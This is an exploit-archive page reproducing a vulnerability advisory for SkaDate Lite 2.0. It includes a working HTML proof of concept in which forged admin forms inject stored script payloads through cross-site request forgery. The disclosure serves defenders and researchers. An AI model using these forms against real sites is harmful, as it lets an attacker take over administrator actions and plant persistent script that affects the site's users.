exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SkaDate Lite 2.0 CSRF / Cross Site Scripting

SkaDate Lite 2.0 CSRF / Cross Site Scripting
Posted Jul 30, 2014
Authored by LiquidWorm | Site zeroscience.mk

SkaDate Lite version 2.0 suffers from multiple cross site request forgery and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | a342e8bef5f90b7cfd0703664b106bee5879eec947174e7edebd140cfb15231e

SkaDate Lite 2.0 CSRF / Cross Site Scripting

Change Mirror Download
<!--

SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities


Vendor: Skalfa LLC
Product web page: http://lite.skadate.com | http://www.skalfa.com
Affected version: 2.0 (build 7651) [Platform version: 1.7.0 (build 7906)]

Summary: SkaDate Lite is a new platform that makes it easy
to start online dating business in just a few easy steps. No
programming or design knowledge is required. Install the solution,
pick a template, and start driving traffic to your new online
dating site.

Desc: SkaDate Lite version 2.0 suffers from multiple cross-site
request forgery and stored xss vulnerabilities. The application
allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Input passed to several POST parameters is not properly
sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: CentOS Linux 6.5 (Final)
nginx/1.6.0
PHP/5.3.28
MySQL 5.5.37


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2014-5197
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5197.php



23.07.2014

-->


<html>
<title>SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities</title>
<body>


<form action="http://192.168.0.105/admin/users/roles/" method="POST">
<input type="hidden" name="form_name" value="add-role" />
<input type="hidden" name="label" value='"><script>alert(1);</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="Execute #1" />
</form>


<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input type="hidden" name="form_name" value="account_type_49693e2b1cb50cad5c42b18a9103f146dcce2ec6" />
<input type="hidden" name="command" value="AddAccountType" />
<input type="hidden" name="key" value="questions_account_type_5615100a931845eca8da20cfdf7327e0" />
<input type="hidden" name="prefix" value="base" />
<input type="hidden" name="accountTypeName" value="5615100a931845eca8da20cfdf7327e0" />
<input type="hidden" name="lang[1][base][questions_account_type_5615100a931845eca8da20cfdf7327e0]" value='"><script>alert(2);</script>' />
<input type="hidden" name="role" value="12" />
<input type="submit" value="Execute #2" />
</form>


<form action="http://192.168.0.105/admin/questions/ajax-responder/" method="POST">
<input type="hidden" name="form_name" value="qst_add_form" />
<input type="hidden" name="qst_name" value='"><script>alert(3);</script>' />
<input type="hidden" name="qst_description" value="ZSL" />
<input type="hidden" name="qst_account_type[0]" value="290365aadde35a97f11207ca7e4279cc" />
<input type="hidden" name="qst_section" value="f90cde5913235d172603cc4e7b9726e3" />
<input type="hidden" name="qst_answer_type" value="text" />
<input type="hidden" name="qst_possible_values" value="%5B%5D" />
<input type="hidden" name="year_range[to]" value="1996" />
<input type="hidden" name="year_range[from]" value="1930" />
<input type="hidden" name="qst_column_count" value="1" />
<input type="hidden" name="qst_required" value="" />
<input type="hidden" name="qst_on_sign_up" value="" />
<input type="hidden" name="qst_on_edit" value="" />
<input type="hidden" name="qst_on_view" value="" />
<input type="hidden" name="qst_on_search" value="" />
<input type="hidden" name="valuesStorage" value="%7B%7D" />
<input type="hidden" name="command" value="addQuestion" />
<input type="submit" value="Execute #3" />
</form>


<form action="http://192.168.0.105/admin/restricted-usernames" method="POST">
<input type="hidden" name="form_name" value='restrictedUsernamesForm"><script>alert(4);</script>' />
<input type="hidden" name="restrictedUsername" value='"><script>alert(5);</script>' />
<input type="hidden" name="addUsername" value="Add" />
<input type="submit" value="Execute #4 & #5" />
</form>


</body>
</html>
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    21 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close